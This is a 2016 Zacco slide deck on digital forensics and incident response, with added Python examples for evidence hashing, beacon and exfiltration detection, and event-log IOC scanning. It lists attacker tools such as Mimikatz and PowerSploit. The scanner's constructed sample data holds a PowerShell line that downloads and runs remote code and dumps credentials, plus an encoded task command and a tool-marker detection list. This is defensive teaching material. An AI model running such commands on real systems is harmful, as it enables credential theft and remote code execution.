
DIRF

DIGITAL FORENSICS AND INCIDENT RESPONSE

KNOWING THE WHO, WHAT, WHY, WHEN AND WHERE


2016-09-13

1 © Zacco 2016
WHO AM I
NIKLAS.ANDERSSON@ZACCO.COM
• Started in IT 1994 and moved into IT Security in 1998 – never looked
back
• Joined Zacco 2016 (previously Coresec/AddPro)
• Experience from security infrastructure like firewalls, IPS/IDP, encryption
and Windows/Linux
• Certifications
• GIAC Certified Forensic Analyst (GCFA)
• GIAC Reverse Engineering Malware (GREM)

Focus on Digital Forensics investigation and Incident Response

ZACCO
EUROPE
Copenhagen, Aarhus, Lyngby, Esbjerg, Munich, Bremen, Oslo, Ålesund, Sarpsborg, Stavanger, Kjeller,
Stockholm, Gothenburg, Anderstorp, Helsingborg, Linköping, Luleå, Lund, Malmö, Norrköping, Skellefteå, Västervik, Uppsala

ZACCO
OUR SERVICES

• Intellectual Property (IP) consultancy
• Patents Management
• Trademark
• Design
• Legal
• Information and IT Security
• Innovation Technology

ZACCO
INFORMATION AND IT SECURITY

• ISMS / ISO 27000 / ITIL / COBIT
• Enterprise Security Architecture (ESA)
• Business Continuity Management
• Digital Forensics
• PCI DSS
• Ethical hacking
• Risk & Controls Assessments
• Cyber Risk Advisory
• Vulnerability Scanning & Assessments
• Data Privacy & Protection
• Awareness training
• Internal Audit

AGENDA
DIRF
• Digital Forensics
• Collect and preserve digital evidence
• Analyze following proven methodologies
• Report – timeline of events and activity
• Requires deep technical knowledge

• Incident Response
• Don’t panic
• Have a plan
• Live acquisition of evidence

DIGITAL FORENSICS
SHORT VERSION
• Digital Forensics is the same thing as Computer Forensics; the term was
popularized in the 1980s when personal computers arrived… …and soon
enough were being used to commit crimes

• The word forensics comes from ”forensic science”, the knowledge of
how to collect, preserve and analyze evidence during an investigation

• Digital forensics is used in both criminal law and private investigations

DIGITAL FORENSICS
FOLLOW PROVEN METHODOLOGIES
• Collect evidence
• Preserve evidence
• Analysis – forensic tools and knowledge
• Create a timeline of the activity
• Present facts, not speculation
• Question the evidence and verify it
• Report (important)
• List and document the evidence for verification purposes
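The collect, preserve and document steps above, as an added example that is not part of the original slides or Zacco's tooling: a small Python helper that hashes every acquired item in chunks, writes a manifest recording who collected what and when, and lets a second analyst re-verify the hashes before analysis begins. The case identifier, collector address and file names are invented, and the "evidence" it creates is a few constructed bytes, not a real image or event log.

```python
"""Added example (not Zacco's tooling): hash, document and re-verify collected evidence.

Every acquired item is hashed in chunks (disk and memory images are large), the
manifest records who collected what and when, and verify_manifest() proves that
nothing changed between acquisition and analysis.
"""
import hashlib
import json
import os
import socket
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # 1 MiB reads keep memory flat for multi-GB images


def hash_file(path: str, algo: str = "sha256") -> str:
    """Hex digest of a file, streamed in chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(evidence_dir: str, collector: str, case_id: str) -> dict:
    """Hash every file under evidence_dir and record the collection context."""
    items = []
    for root, _dirs, files in os.walk(evidence_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            items.append({
                "file": os.path.relpath(path, evidence_dir),
                "size": os.path.getsize(path),
                "sha256": hash_file(path, "sha256"),
                "md5": hash_file(path, "md5"),  # second digest so other tools can cross-check
            })
    return {
        "case": case_id,
        "collector": collector,
        "collected_utc": datetime.now(timezone.utc).isoformat(),
        "collection_host": socket.gethostname(),
        "items": items,
    }


def verify_manifest(evidence_dir: str, manifest: dict) -> list:
    """Files whose presence, size or SHA-256 no longer match the manifest."""
    mismatches = []
    for item in manifest["items"]:
        path = os.path.join(evidence_dir, item["file"])
        if not os.path.exists(path):
            mismatches.append((item["file"], "missing"))
        elif os.path.getsize(path) != item["size"]:
            mismatches.append((item["file"], "size changed"))
        elif hash_file(path, "sha256") != item["sha256"]:
            mismatches.append((item["file"], "sha256 mismatch"))
    return mismatches


def demo() -> tuple:
    """Constructed evidence set (a fake memory image and event log), then tampering."""
    with tempfile.TemporaryDirectory() as d:
        host_dir = os.path.join(d, "host01")
        os.makedirs(host_dir)
        with open(os.path.join(host_dir, "memory.raw"), "wb") as f:
            f.write(b"\x00" * 4096 + b"MZ" + b"\x90" * 2048)  # constructed bytes, not a real dump
        with open(os.path.join(host_dir, "Security.evtx"), "wb") as f:
            f.write(b"ElfFile\x00" + b"A" * 512)  # constructed; only the evtx magic is real
        manifest = build_manifest(d, "analyst@example.com", "CASE-0001")
        clean = verify_manifest(d, manifest)  # expected: []
        with open(os.path.join(host_dir, "memory.raw"), "ab") as f:
            f.write(b"X")  # someone "just had a look" with a tool that wrote to the image
        tampered = verify_manifest(d, manifest)  # expected: size changed on memory.raw
        return len(manifest["items"]), clean, tampered, manifest


if __name__ == "__main__":
    count, clean, tampered, manifest = demo()
    print(json.dumps(manifest, indent=2))
    print("before tampering:", clean or "all hashes match")
    print("after tampering:", tampered)
```

The manifest is what goes into the report's evidence list: anyone who later questions the evidence can re-run the verification against the same files, and a size or hash mismatch tells you immediately that the item was altered after acquisition.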

DIGITAL FORENSICS
TYPES OF INVESTIGATIONS
• Intrusions (External/internal)
• Malware infection
• Internal misuse of IT assets
• Employee stealing/trading company information
• Troubleshooting

DIGITAL FORENSICS
SOURCES
Many different types of devices and applications
• Operating Systems
• Memory Captures/Snapshot
• Hard drive/Clone/Memory card/USB Drives
• Network captures
• Applications
• Databases
• Log sources

DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)
Artifacts found in a memory dump/hibernation file

• Master File Table (MFT)
• Registry hives
• Running processes (find rootkits)
• Processes mapped to user accounts
• Open files
• Network connections

DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)
Artifacts found in a memory dump/hibernation file

• Command line activity
• Execution history
• Local account database
• Event logs
• Scheduled tasks

DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)
Additional artifacts found on a hard drive or VM clone
• Hibernation files
• All files on disk
• Deleted files
• Databases
• Active Directory
• Event logs/application logs
• Application crash dump(s)
• Volume Shadow Copies (snapshots)
• - earlier versions of the MFT, registry hives, logs and hibernation files

DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)

Common attack events

• Infection via email or web
• Malware infection (binary and/or scripts) (depends)
• Metasploit ”Meterpreter” (very common) (depends)
• Dump of AD accounts and passwords
• Dump of web browser passwords
• Persistent foothold

DIGITAL FORENSICS
TYPICAL EVIDENCE OVERVIEW (WINDOWS)

Common attack events

• Created accounts
• Logins to webmail/VPN
• Collected information
• Lateral movement
• Network activity
• Directory browsing
• Opening of documents and pictures

DIGITAL FORENSICS
POPULAR ATTACK VECTORS
• Exploiting bugs in operating systems, services or applications
• Misconfigurations
• Drive-by downloads
• Phishing email
• Key factor in many cases: very helpful end users.
• Execute a binary (.exe)
• Execute scripts (PowerShell, JavaScript, Visual Basic...)

DIGITAL FORENSICS
POPULAR ATTACKER TOOLS
• Metasploit
• SqlMap
• Google
• PowerShell frameworks
• PowerSploit
• Empire
• PSAttack
• Mimikatz (dump passwords)
• NirSoft – web browser password dumpers

The list is long... telnet could be good enough...

DIGITAL FORENSICS
LATERAL MOVEMENT
What this means
• The attacker has compromised a computer behind the perimeter defense
• Additional tools could be downloaded
• PsExec (Sysinternals)
• ”net use” (built in)
• PowerShell (very powerful)
• Remote Desktop
• VBS scripts
• Scheduled tasks
• Mimikatz
This normally does not trigger any alerts on the endpoint or gateway security
products.

DIGITAL FORENSICS
INCIDENT RESPONSE
Be prepared and have a plan
• Most important, don’t panic
• Second, don’t panic
• Know what to do and why before doing anything. (important)
• Write down things of importance
• What do we know
• When did we discover the incident
• Actions taken so far
• Users and accounts involved
• List possible resources involved
• Resource owners and contact information

Could we handle this internally?

DIGITAL FORENSICS
INCIDENT RESPONSE
Collect evidence

• Memory dumps (volatile)
• Virtual machine clones
• Triage collection (volatile)
• Firewall logs
• Event logs

Volatile = information held in memory, only available while the system is running.

DIGITAL FORENSICS
INCIDENT RESPONSE
Collect evidence

• VPN logs
• Webmail logs
• Active Directory
• Hard drives

Steps depend on the known scope

DIGITAL FORENSICS
INCIDENT RESPONSE
Analyze the collected evidence

• Compromised account(s), mapped to system/application access
• Active compromise or malware infection (IOC)
• Network activity, search firewall and SIEM
• Triage collection – active connections or ”hacker” tools running
• Firewall logs – connections from the system(s) involved

IOC = Indicators of Compromise
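The firewall-log and network-activity analysis above, and the later takeaway that data exfiltration hides in normal traffic, as an added example that is not code from the slides or from Zacco: detection logic run over a constructed firewall CSV export. The column layout (timestamp, src, dst, dport, bytes_out), every address and every flow are assumptions for the example; real firewall exports differ.

```python
"""Added example (not Zacco's tooling): beacon and bulk-transfer hunting in firewall logs.

The CSV layout (timestamp, src, dst, dport, bytes_out) is an assumption; real
firewall exports differ. Every address, host and flow below is constructed.
"""
import csv
import io
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: 10.1.20.15 checks in with 203.0.113.50 every ~5 minutes over 443
# (beacon), uploads to 198.51.100.7 like everybody else, and once pushes ~700 MB there.
SAMPLE_LOG = """\
timestamp,src,dst,dport,bytes_out
2016-09-13T08:00:02Z,10.1.20.15,203.0.113.50,443,1420
2016-09-13T08:05:01Z,10.1.20.15,203.0.113.50,443,1380
2016-09-13T08:10:03Z,10.1.20.15,203.0.113.50,443,1402
2016-09-13T08:15:02Z,10.1.20.15,203.0.113.50,443,1395
2016-09-13T08:20:01Z,10.1.20.15,203.0.113.50,443,1410
2016-09-13T08:25:03Z,10.1.20.15,203.0.113.50,443,1390
2016-09-13T08:07:44Z,10.1.20.15,198.51.100.7,443,52000
2016-09-13T08:09:10Z,10.1.20.15,198.51.100.7,443,61000
2016-09-13T08:21:37Z,10.1.20.15,198.51.100.7,443,734000000
2016-09-13T08:31:12Z,10.1.20.15,198.51.100.7,443,64000
2016-09-13T08:11:09Z,10.1.20.22,198.51.100.7,443,48000
2016-09-13T08:40:55Z,10.1.20.22,198.51.100.7,443,51000
2016-09-13T08:03:19Z,10.1.20.22,192.0.2.80,443,2200
2016-09-13T08:33:40Z,10.1.20.22,192.0.2.80,443,2500
"""


def parse_log(text):
    """Turn the CSV export into records with real datetimes and integers."""
    return [{
        "ts": datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": row["src"], "dst": row["dst"],
        "dport": int(row["dport"]), "bytes_out": int(row["bytes_out"]),
    } for row in csv.DictReader(io.StringIO(text))]


def _by_flow(records):
    """Group records by (src, dst, dport)."""
    flows = defaultdict(list)
    for r in records:
        flows[(r["src"], r["dst"], r["dport"])].append(r)
    return flows


def find_beacons(records, min_hits=5, max_cv=0.1):
    """Flows whose inter-connection gaps are too regular to be a human.

    Implants (Meterpreter, Empire agents) check in on a timer, so the coefficient
    of variation (stdev/mean) of the gaps stays near zero. Jittered beacons need a
    larger max_cv, which costs false positives from software updaters.
    """
    hits = []
    for (src, dst, dport), rs in _by_flow(records).items():
        if len(rs) < min_hits:
            continue
        ts = sorted(r["ts"] for r in rs)
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "dport": dport, "hits": len(rs),
                         "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return hits


def find_bulk_uploads(records, abs_bytes=100 * 1024 * 1024, factor=20, min_sessions=3):
    """Sessions that sent far more out than that flow normally does, or a lot in absolute terms.

    Exfiltration over 443 to a popular service matches normal traffic on every
    field except volume, so volume against the flow's own baseline is the test.
    The baseline median excludes the largest session so the outlier cannot hide itself.
    """
    hits = []
    for (src, dst, dport), rs in _by_flow(records).items():
        sizes = sorted(r["bytes_out"] for r in rs)
        baseline = statistics.median(sizes[:-1]) if len(sizes) >= min_sessions else 0
        for r in rs:
            if r["bytes_out"] >= abs_bytes or (baseline and r["bytes_out"] >= factor * baseline):
                hits.append({"src": src, "dst": dst, "dport": dport,
                             "ts": r["ts"].isoformat(), "bytes_out": r["bytes_out"]})
    return hits


def connections_from(records, hosts):
    """Every (dst, dport) a system of interest talked to, to scope the investigation."""
    return sorted({(r["dst"], r["dport"]) for r in records if r["src"] in hosts})


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("beacons:", find_beacons(recs))
    print("bulk uploads:", find_bulk_uploads(recs))
    print("10.1.20.15 talked to:", connections_from(recs, {"10.1.20.15"}))
```

Both checks need the full in/out traffic log the takeaways ask for: a beacon only stands out over many hits, and a bulk upload only stands out against the flow's own history.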

DIGITAL FORENSICS
INCIDENT RESPONSE
Analyze the collected evidence

• Event logs – a lot of valuable info
• VPN logs – connections from compromised accounts
• Active Directory compromised (Houston, we have a problem)
• Webmail logs – why? Because we keep valuable internal information in mailboxes going years back
• Active Directory – new accounts, suspicious activity
• Hard drives – deeper investigation is required

Steps depend on the known scope of the investigation and may change during the
investigation
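The event-log, Active Directory and VPN analysis above, together with the lateral-movement slide earlier, as an added example that is not code from the slides or from Zacco: it walks constructed Windows event records and VPN lines, grows the set of compromised accounts as the evidence shows tool execution, PsExec use and attacker-created accounts, maps each compromised account to the systems it logged on to, and orders the findings into a timeline. The record layout, host names, accounts, addresses and the VPN line format are invented; the event IDs are the documented Windows ones.

```python
"""Added example (not Zacco's tooling): scanning exported Windows events for IOCs.

Records are constructed in the shape a JSON export of the Security, System and
PowerShell/Operational logs might take; real exports carry many more fields and
the VPN line format is invented. Event IDs are the documented Windows ones.
"""
from collections import defaultdict

ACCOUNT_CREATED = 4720    # Security: a user account was created
LOGON = 4624              # Security: an account was successfully logged on
SERVICE_INSTALLED = 7045  # System: a service was installed in the system
TASK_CREATED = 4698       # Security: a scheduled task was created
PS_SCRIPTBLOCK = 4104     # Microsoft-Windows-PowerShell/Operational: script block text

LOGON_TYPES = {2: "interactive", 3: "network", 10: "remote interactive (RDP)"}
TOOL_MARKERS = ("invoke-mimikatz", "sekurlsa::", "invoke-empire", "powersploit", "psattack")

# Constructed sample records (no real incident). jdoe is the phishing victim the
# investigation started from; bkup01 is a legitimate service account for contrast.
EVENTS = [
    {"time": "2016-09-12T09:15:00Z", "host": "FS-01", "id": 4624, "user": "bkup01", "logon_type": 3, "src_ip": "10.1.5.9"},
    {"time": "2016-09-12T14:02:11Z", "host": "WS-0117", "id": 4624, "user": "jdoe", "logon_type": 2, "src_ip": "-"},
    {"time": "2016-09-12T14:05:40Z", "host": "WS-0117", "id": 4104, "user": "jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.50/a'); Invoke-Mimikatz -DumpCreds"},
    {"time": "2016-09-12T14:21:03Z", "host": "FS-01", "id": 4624, "user": "svc_backup", "logon_type": 3, "src_ip": "10.1.20.15"},
    {"time": "2016-09-12T14:21:05Z", "host": "FS-01", "id": 7045, "user": "svc_backup",
     "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"time": "2016-09-12T14:30:17Z", "host": "DC-01", "id": 4624, "user": "svc_backup", "logon_type": 10, "src_ip": "10.1.20.15"},
    {"time": "2016-09-12T14:32:48Z", "host": "DC-01", "id": 4720, "user": "svc_backup", "target_user": "helpdesk2"},
    {"time": "2016-09-12T14:35:02Z", "host": "DC-01", "id": 4698, "user": "helpdesk2",
     "task_name": "\\Microsoft\\Windows\\Update\\SyncCheck", "task_command": "powershell.exe -enc SQBFAFgA"},
    {"time": "2016-09-12T16:10:55Z", "host": "FS-01", "id": 4624, "user": "jdoe", "logon_type": 3, "src_ip": "10.1.20.15"},
]

# Constructed VPN concentrator lines: "time user src_ip result".
VPN_LOG = """\
2016-09-13T02:14:09Z helpdesk2 198.51.100.7 success
2016-09-13T06:55:31Z jdoe 192.0.2.80 success
2016-09-13T07:01:12Z mrobinson 192.0.2.44 success
"""


def analyze(events, vpn_log, known_compromised):
    """Return (findings sorted by time, account -> hosts logged on to, all compromised accounts)."""
    compromised = set(known_compromised)
    findings = []
    access = defaultdict(set)
    by_time = sorted(events, key=lambda e: e["time"])

    def note(ev, what):
        findings.append((ev["time"], ev["host"], ev["id"], ev.get("user"), what))

    # Pass 1: events that expand the set of compromised accounts, in time order,
    # so that an account created by an attacker is itself treated as attacker-controlled.
    for ev in by_time:
        if ev["id"] == PS_SCRIPTBLOCK and any(m in ev.get("script", "").lower() for m in TOOL_MARKERS):
            note(ev, "attacker PowerShell tooling executed")
            compromised.add(ev["user"])
        elif ev["id"] == SERVICE_INSTALLED and "psexesvc" in (ev.get("service_name", "") + ev.get("image_path", "")).lower():
            note(ev, "PsExec service installed (remote execution)")
            compromised.add(ev["user"])
        elif ev["id"] == ACCOUNT_CREATED:
            note(ev, f"account {ev['target_user']} created")
            if ev["user"] in compromised:
                compromised.add(ev["target_user"])

    # Pass 2: map every compromised account to the systems it reached, flag
    # network/RDP logons (lateral movement) and scheduled tasks (persistence).
    for ev in by_time:
        if ev.get("user") not in compromised:
            continue
        if ev["id"] == LOGON:
            access[ev["user"]].add(ev["host"])
            if ev["logon_type"] in (3, 10):
                note(ev, f"{LOGON_TYPES[ev['logon_type']]} logon from {ev['src_ip']} (lateral movement)")
        elif ev["id"] == TASK_CREATED:
            note(ev, f"scheduled task {ev['task_name']} runs {ev['task_command']} (persistence)")

    # VPN: any successful login by a compromised account is external access to chase.
    for line in vpn_log.splitlines():
        time, user, ip, result = line.split()
        if user in compromised and result == "success":
            findings.append((time, "VPN", None, user, f"VPN login from {ip} with compromised account"))

    findings.sort(key=lambda f: f[0])
    return findings, {u: sorted(h) for u, h in access.items()}, compromised


if __name__ == "__main__":
    timeline, access, compromised = analyze(EVENTS, VPN_LOG, {"jdoe"})
    for time, host, event_id, user, what in timeline:
        print(f"{time} {host:<8} {str(event_id):<5} {user:<11} {what}")
    print("compromised accounts:", sorted(compromised))
    print("account -> systems:", access)
```

The two-pass structure is the point: the scope grows while you analyze (one phished user becomes a service account, a domain controller and a new helpdesk account), which is why the slides say the steps may change during the investigation. Every finding carries the timestamp and host it came from so the report can present the timeline as facts rather than speculation.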

DIGITAL FORENSICS
TAKEAWAYS
• Removing malware or blocking traffic is NOT enough.
• Additional malware or persistence may still exist.
• Reinstalling infected or compromised systems will destroy
evidence
• Data exfiltration is hidden in normal traffic.
• Attackers’ lateral movement might not be detected as
suspicious
• New accounts might have been created
• If we don’t know the root cause of the incident, how can we fix
it?

DIGITAL FORENSICS
TAKEAWAYS
• Learn the weak spots and prioritize based on risk
• Change log settings to retain logs further back in time
• Save all logs in a safe place for as long as you can.
• Use 2FA for VPN, webmail and other external access
• Log all traffic in and out of the company/organisation
• Update and configure PowerShell
• Volume Shadow Copies are built in (do not turn them off)
• Limit the use of administrative privileges

DIGITAL FORENSICS
MOST IMPORTANT

Learn something useful and improve for next time

Yes, there will be a next time! 
